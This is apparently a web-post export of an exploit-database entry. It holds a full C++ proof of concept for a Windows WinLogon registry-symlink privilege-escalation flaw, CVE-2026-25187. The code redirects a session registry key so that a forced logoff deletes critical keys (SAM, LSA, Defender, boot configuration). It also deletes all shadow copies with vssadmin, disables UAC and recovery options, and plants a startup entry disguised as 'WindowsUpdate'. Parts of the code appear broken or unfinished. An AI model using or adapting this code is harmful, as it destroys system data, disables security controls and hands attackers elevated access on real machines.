{"id":49971,"date":"2026-04-28T13:52:46","date_gmt":"2026-04-28T13:52:46","guid":{"rendered":"http:\/\/localhost\/?p=49971"},"modified":"2026-04-28T13:52:46","modified_gmt":"2026-04-28T13:52:46","slug":"microsoft-winlogon-registry-deletion-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=49971","title":{"rendered":"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation_PACKETSTORM:219937"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-28T17:32:20&#8243;,&#8221;description&#8221;:&#8221;This code represents a highly destructive proof of concept targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise. The exploit is built around abusing Registry symbolic links&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219937&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-25187&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : WinLogon Registry Deletion Exploit Privilege Escalation PoC                                                      |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : No standalone download available                                                                                 |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : This code represents a highly destructive proof-of-concept CVE-2026-25187 targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise.\\n                     The exploit is built around abusing Registry symbolic links and session-based Accessibility paths to redirect sensitive system keys into locations affected during user logoff or session transitions.\\n    \\n    [+] POC        :  \\n    \\n    #include \\u003cWindows.h\\u003e\\n    #include \\u003ccomdef.h\\u003e\\n    #include \\u003cstdio.h\\u003e\\n    #include \\u003cvector\\u003e\\n    #include \\u003cstring\\u003e\\n    #include \\u003cmap\\u003e\\n    #include \\u003cthread\\u003e\\n    #include \\u003cchrono\\u003e\\n    #include \\u003csddl.h\\u003e\\n    #include \\u003cwinternl.h\\u003e\\n    #include \\u003caclapi.h\\u003e\\n    #include \\u003clm.h\\u003e\\n    #pragma comment(lib, \\&#8221;advapi32.lib\\&#8221;)\\n    #pragma comment(lib, \\&#8221;user32.lib\\&#8221;)\\n    #pragma comment(lib, \\&#8221;netapi32.lib\\&#8221;)\\n    #define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)\\n    #define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)\\n    \\n    extern \\&#8221;C\\&#8221; {\\n        NTSTATUS NTAPI NtCreateKey(\\n            PHANDLE KeyHandle,\\n            ACCESS_MASK DesiredAccess,\\n            POBJECT_ATTRIBUTES ObjectAttributes,\\n            ULONG TitleIndex,\\n            PUNICODE_STRING Class,\\n            ULONG CreateOptions,\\n            PULONG Disposition\\n        );\\n    \\n        NTSTATUS NTAPI NtOpenKeyEx(\\n            PHANDLE KeyHandle,\\n            ACCESS_MASK DesiredAccess,\\n            POBJECT_ATTRIBUTES ObjectAttributes,\\n            ULONG OpenOptions\\n        );\\n    \\n        NTSTATUS NTAPI NtSetValueKey(\\n            HANDLE KeyHandle,\\n            PUNICODE_STRING ValueName,\\n            ULONG TitleIndex,\\n            ULONG Type,\\n            PVOID Data,\\n            ULONG DataSize\\n        );\\n    \\n        NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);\\n        NTSTATUS NTAPI NtOpenKey(\\n            PHANDLE KeyHandle,\\n            ACCESS_MASK DesiredAccess,\\n            POBJECT_ATTRIBUTES ObjectAttributes\\n        );\\n        \\n        NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);\\n        VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);\\n    }\\n    class RegistryUtils {\\n    public:\\n        static std::wstring GetUserSid() {\\n            HANDLE hToken = nullptr;\\n            if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, \\u0026hToken))\\n                return L\\&#8221;\\&#8221;;\\n    \\n            DWORD dwSize = 0;\\n            GetTokenInformation(hToken, TokenUser, nullptr, 0, \\u0026dwSize);\\n            \\n            std::vector\\u003cBYTE\\u003e buffer(dwSize);\\n            if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, \\u0026dwSize)) {\\n                CloseHandle(hToken);\\n                return L\\&#8221;\\&#8221;;\\n            }\\n    \\n            PTOKEN_USER pTokenUser = reinterpret_cast\\u003cPTOKEN_USER\\u003e(buffer.data());\\n            LPWSTR lpSid = nullptr;\\n            \\n            if (!ConvertSidToStringSid(pTokenUser-\\u003eUser.Sid, \\u0026lpSid)) {\\n                CloseHandle(hToken);\\n                return L\\&#8221;\\&#8221;;\\n            }\\n    \\n            std::wstring sid(lpSid);\\n            LocalFree(lpSid);\\n            CloseHandle(hToken);\\n            \\n            return sid;\\n        }\\n    \\n        static std::wstring RegPathToNative(const std::wstring\\u0026 path) {\\n            std::wstring regpath = L\\&#8221;\\\\\\\\Registry\\\\\\\\\\&#8221;;\\n    \\n            if (path.empty() || path[0] == L&#8217;\\\\\\\\&#8217;)\\n                return path;\\n    \\n            if (path.find(L\\&#8221;HKLM\\\\\\\\\\&#8221;) == 0) {\\n                return regpath + L\\&#8221;Machine\\\\\\\\\\&#8221; + path.substr(5);\\n            }\\n            else if (path.find(L\\&#8221;HKU\\\\\\\\\\&#8221;) == 0) {\\n                return regpath + L\\&#8221;User\\\\\\\\\\&#8221; + path.substr(4);\\n            }\\n            else if (path.find(L\\&#8221;HKCU\\\\\\\\\\&#8221;) == 0) {\\n                return regpath + L\\&#8221;User\\\\\\\\\\&#8221; + GetUserSid() + L\\&#8221;\\\\\\\\\\&#8221; + path.substr(5);\\n            }\\n            else if (path.find(L\\&#8221;HKCR\\\\\\\\\\&#8221;) == 0) {\\n                return regpath + L\\&#8221;Machine\\\\\\\\Software\\\\\\\\Classes\\\\\\\\\\&#8221; + path.substr(5);\\n            }\\n            \\n            return L\\&#8221;\\&#8221;;\\n        }\\n    \\n        static bool CreateRegistrySymlink(const std::wstring\\u0026 symlink, const std::wstring\\u0026 target, bool isVolatile) {\\n            std::wstring nativeSymlink = RegPathToNative(symlink);\\n            std::wstring nativeTarget = RegPathToNative(target);\\n    \\n            if (nativeSymlink.empty() || nativeTarget.empty())\\n                return false;\\n    \\n            printf(\\&#8221;[*] Creating symlink: %ls -\\u003e %ls\\\\n\\&#8221;, nativeSymlink.c_str(), nativeTarget.c_str());\\n            DeleteRegistrySymlink(symlink);\\n    \\n            UNICODE_STRING name;\\n            RtlInitUnicodeString(\\u0026name, nativeSymlink.c_str());\\n    \\n            OBJECT_ATTRIBUTES objAttr;\\n            InitializeObjectAttributes(\\u0026objAttr, \\u0026name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);\\n    \\n            HANDLE hKey = nullptr;\\n            ULONG disposition = 0;\\n            \\n            ULONG options = INTERNAL_REG_OPTION_CREATE_LINK | \\n                            (isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);\\n    \\n            NTSTATUS status = NtCreateKey(\\u0026hKey, KEY_ALL_ACCESS, \\u0026objAttr, 0, nullptr, options, \\u0026disposition);\\n            \\n            if (status != 0) {\\n                SetLastError(RtlNtStatusToDosError(status));\\n                return false;\\n            }\\n    \\n            UNICODE_STRING valueName;\\n            RtlInitUnicodeString(\\u0026valueName, L\\&#8221;SymbolicLinkValue\\&#8221;);\\n    \\n            status = NtSetValueKey(hKey, \\u0026valueName, 0, REG_LINK, \\n                                   (PVOID)nativeTarget.c_str(), \\n                                   nativeTarget.length() * sizeof(WCHAR));\\n            \\n            CloseHandle(hKey);\\n            \\n            if (status != 0) {\\n                SetLastError(RtlNtStatusToDosError(status));\\n                return false;\\n            }\\n    \\n            printf(\\&#8221;[+] Symlink created successfully\\\\n\\&#8221;);\\n            return true;\\n        }\\n    \\n        static bool DeleteRegistrySymlink(const std::wstring\\u0026 symlink) {\\n            std::wstring nativeSymlink = RegPathToNative(symlink);\\n            if (nativeSymlink.empty())\\n                return false;\\n    \\n            UNICODE_STRING name;\\n            RtlInitUnicodeString(\\u0026name, nativeSymlink.c_str());\\n    \\n            OBJECT_ATTRIBUTES objAttr;\\n            InitializeObjectAttributes(\\u0026objAttr, \\u0026name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);\\n    \\n            HANDLE hKey = nullptr;\\n            NTSTATUS status = NtOpenKeyEx(\\u0026hKey, DELETE, \\u0026objAttr, 0);\\n            \\n            if (status != 0) {\\n                return true;\\n            }\\n    \\n            status = NtDeleteKey(hKey);\\n            CloseHandle(hKey);\\n    \\n            return status == 0;\\n        }\\n    \\n        static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring\\u0026 subKey) {\\n            HKEY hKey = nullptr;\\n            if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, \\u0026hKey) != ERROR_SUCCESS) {\\n                return false;\\n            }\\n            DWORD index = 0;\\n            WCHAR valueName[256];\\n            DWORD valueNameSize = 256;\\n            \\n            while (RegEnumValueW(hKey, index++, valueName, \\u0026valueNameSize, nullptr, \\n                                  nullptr, nullptr, nullptr) == ERROR_SUCCESS) {\\n                RegDeleteValueW(hKey, valueName);\\n                valueNameSize = 256;\\n                index&#8211;;\\n            }\\n            index = 0;\\n            WCHAR subKeyName[256];\\n            DWORD subKeyNameSize = 256;\\n            \\n            while (RegEnumKeyExW(hKey, index++, subKeyName, \\u0026subKeyNameSize, nullptr,\\n                                  nullptr, nullptr, nullptr) == ERROR_SUCCESS) {\\n                std::wstring fullPath = subKey + L\\&#8221;\\\\\\\\\\&#8221; + subKeyName;\\n                DeleteRegistryTreeManual(rootKey, fullPath);\\n                subKeyNameSize = 256;\\n                index&#8211;;\\n            }\\n    \\n            RegCloseKey(hKey);\\n            return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;\\n        }\\n    };\\n    \\n    class WinLogonEoPExploit {\\n    private:\\n        std::wstring m_sessionPath;\\n        std::vector\\u003cstd::pair\\u003cstd::wstring, std::wstring\\u003e\\u003e m_targets;\\n        bool m_persistentMode;\\n        \\n        void InitializeTargets() {\\n    \\n            m_targets = {\\n                {L\\&#8221;uac_bypass\\&#8221;, L\\&#8221;HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\System\\&#8221;},\\n                {L\\&#8221; defender\\&#8221;, L\\&#8221;HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows Defender\\&#8221;},\\n                {L\\&#8221;security_policies\\&#8221;, L\\&#8221;HKLM\\\\\\\\SECURITY\\\\\\\\Policy\\&#8221;},\\n                {L\\&#8221;lsa_config\\&#8221;, L\\&#8221;HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Lsa\\&#8221;},\\n                {L\\&#8221;sam_key\\&#8221;, L\\&#8221;HKLM\\\\\\\\SAM\\\\\\\\SAM\\\\\\\\Domains\\\\\\\\Account\\&#8221;},\\n                {L\\&#8221;cached_creds\\&#8221;, L\\&#8221;HKLM\\\\\\\\SECURITY\\\\\\\\Cache\\&#8221;},\\n                {L\\&#8221;ci_policies\\&#8221;, L\\&#8221;HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\CI\\\\\\\\Policy\\&#8221;},\\n                {L\\&#8221;code_integrity\\&#8221;, L\\&#8221;HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\DeviceGuard\\&#8221;},\\n                {L\\&#8221;uac_settings\\&#8221;, L\\&#8221;HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\System\\\\\\\\UAC\\&#8221;},\\n                {L\\&#8221;boot_config\\&#8221;, L\\&#8221;HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Boot\\&#8221;},\\n                {L\\&#8221;winlogon\\&#8221;, L\\&#8221;HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Winlogon\\&#8221;},\\n                {L\\&#8221;critical_services\\&#8221;, L\\&#8221;HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\&#8221;},\\n            };\\n        }\\n    \\n        std::wstring BuildSessionPath() {\\n            DWORD sessionId = 0;\\n            ProcessIdToSessionId(GetCurrentProcessId(), \\u0026sessionId);\\n            \\n            wchar_t path[512];\\n            swprintf_s(path, L\\&#8221;HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\Session%d\\\\\\\\ATConfig\\&#8221;, \\n                       sessionId);\\n            return std::wstring(path);\\n        }\\n    \\n        bool PrepareRegistryTarget(const std::wstring\\u0026 targetPath) {\\n            printf(\\&#8221;[*] Preparing target: %ls\\\\n\\&#8221;, targetPath.c_str());\\n    \\n            std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);\\n            if (nativeTarget.empty()) {\\n                printf(\\&#8221;[!] Invalid target path\\\\n\\&#8221;);\\n                return false;\\n            }\\n    \\n            HKEY hKey = nullptr;\\n            std::wstring cleanPath = targetPath;\\n    \\n            if (cleanPath.find(L\\&#8221;HKLM\\\\\\\\\\&#8221;) == 0) {\\n                cleanPath = cleanPath.substr(5);\\n            }\\n            \\n            if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,\\n                                REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,\\n                                \\u0026hKey, nullptr) == ERROR_SUCCESS) {\\n                DWORD dummy = 0xDEADBEEF;\\n                RegSetValueExW(hKey, L\\&#8221;exploit_marker\\&#8221;, 0, REG_DWORD, \\n                              (BYTE*)\\u0026dummy, sizeof(dummy));\\n                RegCloseKey(hKey);\\n                printf(\\&#8221;[+] Target key created\/verified\\\\n\\&#8221;);\\n            }\\n            \\n            return true;\\n        }\\n    \\n        bool CreateMaliciousSymlink(const std::wstring\\u0026 targetPath) {\\n            printf(\\&#8221;\\\\n[*] Creating malicious registry symlink&#8230;\\\\n\\&#8221;);\\n    \\n            std::wstring pathWithoutHKLM = m_sessionPath;\\n            if (pathWithoutHKLM.find(L\\&#8221;HKLM\\\\\\\\\\&#8221;) == 0) {\\n                pathWithoutHKLM = pathWithoutHKLM.substr(5);\\n            }\\n    \\n            RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());\\n    \\n            if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {\\n                printf(\\&#8221;[!] Failed to create symlink: %d\\\\n\\&#8221;, GetLastError());\\n                return false;\\n            }\\n            \\n            return true;\\n        }\\n    \\n        bool TriggerLogout() {\\n            printf(\\&#8221;\\\\n[*] Triggering user logout&#8230;\\\\n\\&#8221;);\\n    \\n            BOOL result = FALSE;\\n    \\n            result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);\\n            if (result) {\\n                printf(\\&#8221;[+] Logout initiated via ExitWindowsEx\\\\n\\&#8221;);\\n                return true;\\n            }\\n    \\n            result = InitiateSystemShutdownExW(nullptr, L\\&#8221;System will logout for maintenance\\&#8221;,\\n                                               5, TRUE, TRUE, \\n                                               SHTDN_REASON_MAJOR_APPLICATION);\\n            if (result) {\\n                printf(\\&#8221;[+] Logout initiated via InitiateSystemShutdownEx\\\\n\\&#8221;);\\n                return true;\\n            }\\n            HANDLE hToken = nullptr;\\n            if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, \\u0026hToken)) {\\n                TOKEN_PRIVILEGES tp;\\n                LUID luid;\\n                if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, \\u0026luid)) {\\n                    tp.PrivilegeCount = 1;\\n                    tp.Privileges[0].Luid = luid;\\n                    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\\n                    AdjustTokenPrivileges(hToken, FALSE, \\u0026tp, 0, nullptr, 0);\\n                }\\n                CloseHandle(hToken);\\n            }\\n            \\n            result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);\\n            \\n            return result != FALSE;\\n        }\\n    \\n        void DisableRecoveryMechanisms() {\\n    \\n            printf(\\&#8221;[*] Disabling recovery mechanisms&#8230;\\\\n\\&#8221;);\\n    \\n            HKEY hKey = nullptr;\\n            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, \\n                             L\\&#8221;SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Session Manager\\\\\\\\Configuration Manager\\&#8221;,\\n                             0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n                DWORD disable = 1;\\n                RegSetValueExW(hKey, L\\&#8221;LastKnownGoodEnabled\\&#8221;, 0, REG_DWORD, \\n                              (BYTE*)\\u0026disable, sizeof(disable));\\n                RegCloseKey(hKey);\\n            }\\n    \\n            system(\\&#8221;vssadmin delete shadows \/all \/quiet \\u003e nul 2\\u003e\\u00261\\&#8221;);\\n        }\\n    \\n    public:\\n        WinLogonEoPExploit(bool persistentMode = false) \\n            : m_persistentMode(persistentMode) {\\n            InitializeTargets();\\n        }\\n    \\n        bool ExploitSingleTarget(const std::wstring\\u0026 targetName, const std::wstring\\u0026 targetPath) {\\n            printf(\\&#8221;\\\\n=== Attacking target: %ls ===\\\\n\\&#8221;, targetName.c_str());\\n    \\n            if (!PrepareRegistryTarget(targetPath))\\n                return false;\\n    \\n            if (!CreateMaliciousSymlink(targetPath))\\n                return false;\\n    \\n            if (!TriggerLogout()) {\\n                printf(\\&#8221;[!] Failed to trigger logout\\\\n\\&#8221;);\\n                return false;\\n            }\\n    \\n            return true;\\n        }\\n    \\n        bool ExploitMultipleTargets() {\\n            printf(\\&#8221;\\\\n\\&#8221;);\\n            printf(\\&#8221;========================================\\\\n\\&#8221;);\\n            printf(\\&#8221;  CVE-2026-25187 &#8211; WinLogon EoP Exploit\\\\n\\&#8221;);\\n            printf(\\&#8221;  Registry Deletion to SYSTEM\\\\n\\&#8221;);\\n            printf(\\&#8221;========================================\\\\n\\\\n\\&#8221;);\\n    \\n            m_sessionPath = BuildSessionPath();\\n            printf(\\&#8221;[*] Session path: %ls\\\\n\\&#8221;, m_sessionPath.c_str());\\n    \\n            RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n            \\n            if (m_persistentMode) {\\n                AddPersistence();\\n            }\\n    \\n            DisableRecoveryMechanisms();\\n    \\n            printf(\\&#8221;\\\\n[*] Available targets:\\\\n\\&#8221;);\\n            for (size_t i = 0; i \\u003c m_targets.size(); i++) {\\n                printf(\\&#8221;    [%zu] %ls &#8211; %ls\\\\n\\&#8221;, i, m_targets[i].first.c_str(), m_targets[i].second.c_str());\\n            }\\n            \\n            printf(\\&#8221;\\\\n[*] Targeting all critical keys for maximum impact&#8230;\\\\n\\&#8221;);\\n    \\n            for (const auto\\u0026 target : m_targets) {\\n    \\n                RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n                \\n                if (CreateMaliciousSymlink(target.second)) {\\n                    printf(\\&#8221;[+] Symlink created for %ls\\\\n\\&#8221;, target.first.c_str());\\n    \\n                    Sleep(100);\\n                }\\n            }\\n    \\n            printf(\\&#8221;\\\\n[*] Triggering final logout for mass deletion&#8230;\\\\n\\&#8221;);\\n            TriggerLogout();\\n            \\n            return true;\\n        }\\n    \\n        void AddPersistence() {\\n            HKEY hKey = nullptr;\\n            if (RegOpenKeyExW(HKEY_CURRENT_USER, \\n                             L\\&#8221;Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\&#8221;,\\n                             0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n                \\n                wchar_t path[MAX_PATH];\\n                GetModuleFileNameW(nullptr, path, MAX_PATH);\\n                \\n                RegSetValueExW(hKey, L\\&#8221;WindowsUpdate\\&#8221;, 0, REG_SZ, \\n                              (BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));\\n                RegCloseKey(hKey);\\n                \\n                printf(\\&#8221;[+] Persistence added to HKCU\\\\\\\\Run\\\\n\\&#8221;);\\n            }\\n        }\\n    \\n        bool CreateMassiveRegistryCorruption() {\\n    \\n            printf(\\&#8221;\\\\n[*] Creating massive registry corruption&#8230;\\\\n\\&#8221;);\\n            \\n            std::vector\\u003cstd::wstring\\u003e extraTargets = {\\n                L\\&#8221;HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Session Manager\\\\\\\\Executive\\&#8221;,\\n                L\\&#8221;HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Session Manager\\\\\\\\Memory Management\\&#8221;,\\n                L\\&#8221;HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\SecurityProviders\\\\\\\\SCHANNEL\\&#8221;,\\n                L\\&#8221;HKLM\\\\\\\\SOFTWARE\\\\\\\\Policies\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\System\\&#8221;,\\n                L\\&#8221;HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\Explorer\\&#8221;,\\n            };\\n            \\n            for (const auto\\u0026 target : extraTargets) {\\n                RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n                \\n                if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {\\n                    printf(\\&#8221;[+] Corruption symlink created for: %ls\\\\n\\&#8221;, target.c_str());\\n                    Sleep(50);\\n                }\\n            }\\n            \\n            return true;\\n        }\\n    };\\n    \\n    class PrivilegeEscalation {\\n    public:\\n        static bool DisableUAC() {\\n            printf(\\&#8221;[*] Disabling UAC&#8230;\\\\n\\&#8221;);\\n            \\n            HKEY hKey = nullptr;\\n            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,\\n                             L\\&#8221;SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\System\\&#8221;,\\n                             0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n                \\n                DWORD disable = 0;\\n                RegSetValueExW(hKey, L\\&#8221;EnableLUA\\&#8221;, 0, REG_DWORD, (BYTE*)\\u0026disable, sizeof(disable));\\n                RegSetValueExW(hKey, L\\&#8221;ConsentPromptBehaviorAdmin\\&#8221;, 0, REG_DWORD, (BYTE*)\\u0026disable, sizeof(disable));\\n                \\n                RegCloseKey(hKey);\\n                printf(\\&#8221;[+] UAC disabled (requires reboot)\\\\n\\&#8221;);\\n                return true;\\n            }\\n            \\n            return false;\\n        }\\n        \\n        static bool GrantDebugPrivileges() {\\n            printf(\\&#8221;[*] Granting debug privileges&#8230;\\\\n\\&#8221;);\\n            \\n            HKEY hKey = nullptr;\\n            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,\\n                             L\\&#8221;SECURITY\\\\\\\\Policy\\\\\\\\Privileges\\&#8221;,\\n                             0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n                RegCloseKey(hKey);\\n                return true;\\n            }\\n            \\n            return false;\\n        }\\n    };\\n    \\n    int wmain(int argc, wchar_t* argv[]) {\\n        printf(\\&#8221;\\\\n\\&#8221;);\\n        printf(\\&#8221;========================================\\\\n\\&#8221;);\\n        printf(\\&#8221;  CVE-2026-25187 &#8211; Critical EoP Exploit\\\\n\\&#8221;);\\n        printf(\\&#8221;  WinLogon Registry Deletion to SYSTEM\\\\n\\&#8221;);\\n        printf(\\&#8221;========================================\\\\n\\\\n\\&#8221;);\\n    \\n        bool massDeletion = false;\\n        bool persistent = false;\\n        int targetIndex = -1;\\n        \\n        for (int i = 1; i \\u003c argc; i++) {\\n            if (_wcsicmp(argv[i], L\\&#8221;&#8211;mass\\&#8221;) == 0) {\\n                massDeletion = true;\\n            }\\n            else if (_wcsicmp(argv[i], L\\&#8221;&#8211;persist\\&#8221;) == 0) {\\n                persistent = true;\\n            }\\n            else if (_wcsicmp(argv[i], L\\&#8221;&#8211;target\\&#8221;) == 0 \\u0026\\u0026 i + 1 \\u003c argc) {\\n                targetIndex = _wtoi(argv[++i]);\\n            }\\n            else if (_wcsicmp(argv[i], L\\&#8221;&#8211;help\\&#8221;) == 0) {\\n                printf(\\&#8221;Usage: %s [options]\\\\n\\&#8221;, argv[0]);\\n                printf(\\&#8221;Options:\\\\n\\&#8221;);\\n                printf(\\&#8221;  &#8211;mass        Mass delete multiple critical keys\\\\n\\&#8221;);\\n                printf(\\&#8221;  &#8211;persist     Add persistence to startup\\\\n\\&#8221;);\\n                printf(\\&#8221;  &#8211;target N    Attack specific target by index\\\\n\\&#8221;);\\n                printf(\\&#8221;  &#8211;disable-uac Disable UAC after deletion\\\\n\\&#8221;);\\n                printf(\\&#8221;\\\\nWARNING: This exploit will cause system instability!\\\\n\\&#8221;);\\n                return 0;\\n            }\\n        }\\n    \\n        printf(\\&#8221;[!] WARNING: This exploit will delete critical registry keys!\\\\n\\&#8221;);\\n        printf(\\&#8221;[!] System may become UNBOOTABLE or severely damaged.\\\\n\\&#8221;);\\n        printf(\\&#8221;[!] Continue? (y\/N): \\&#8221;);\\n        \\n        wint_t ch = towlower(getwchar());\\n        if (ch != L&#8217;y&#8217;) {\\n            printf(\\&#8221;[*] Exploit aborted.\\\\n\\&#8221;);\\n            return 0;\\n        }\\n        \\n        WinLogonEoPExploit exploit(persistent);\\n        \\n        bool success = false;\\n        \\n        if (massDeletion) {\\n            printf(\\&#8221;\\\\n[*] Running mass deletion mode&#8230;\\\\n\\&#8221;);\\n            success = exploit.ExploitMultipleTargets();\\n            exploit.CreateMassiveRegistryCorruption();\\n        } else {\\n            printf(\\&#8221;\\\\n[*] Available targets:\\\\n\\&#8221;);\\n            printf(\\&#8221;    0 &#8211; UAC Bypass (Disable UAC)\\\\n\\&#8221;);\\n            printf(\\&#8221;    1 &#8211; Windows Defender\\\\n\\&#8221;);\\n            printf(\\&#8221;    2 &#8211; Security Policies\\\\n\\&#8221;);\\n            printf(\\&#8221;    3 &#8211; LSA Configuration\\\\n\\&#8221;);\\n            printf(\\&#8221;    4 &#8211; SAM (Password Hashes)\\\\n\\&#8221;);\\n            printf(\\&#8221;    5 &#8211; Cached Credentials\\\\n\\&#8221;);\\n            printf(\\&#8221;    6 &#8211; Code Integrity\\\\n\\&#8221;);\\n            printf(\\&#8221;    7 &#8211; Boot Configuration (DoS)\\\\n\\&#8221;);\\n            printf(\\&#8221;    8 &#8211; ALL (Mass Deletion)\\\\n\\&#8221;);\\n            \\n            int choice = targetIndex;\\n            if (choice == -1) {\\n                printf(\\&#8221;\\\\n[*] Select target (0-8): \\&#8221;);\\n                wscanf_s(L\\&#8221;%d\\&#8221;, \\u0026choice);\\n            }\\n            \\n            if (choice == 8) {\\n                success = exploit.ExploitMultipleTargets();\\n            } else if (choice \\u003e= 0 \\u0026\\u0026 choice \\u003c 8) {\\n                auto\\u0026 target = exploit.m_targets[choice];\\n                success = exploit.ExploitSingleTarget(target.first, target.second);\\n    \\n                if (choice == 0) {\\n                    PrivilegeEscalation::DisableUAC();\\n                }\\n            }\\n        }\\n        \\n        if (success) {\\n            printf(\\&#8221;\\\\n[+] Exploit triggered! System will logout now.\\\\n\\&#8221;);\\n            printf(\\&#8221;[*] After login, check if target registry keys are deleted.\\\\n\\&#8221;);\\n            Sleep(2000);\\n        } else {\\n            printf(\\&#8221;\\\\n[!] Exploit failed. Try running again or use different target.\\\\n\\&#8221;);\\n        }\\n        \\n        return 0;\\n    }\\n    \\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    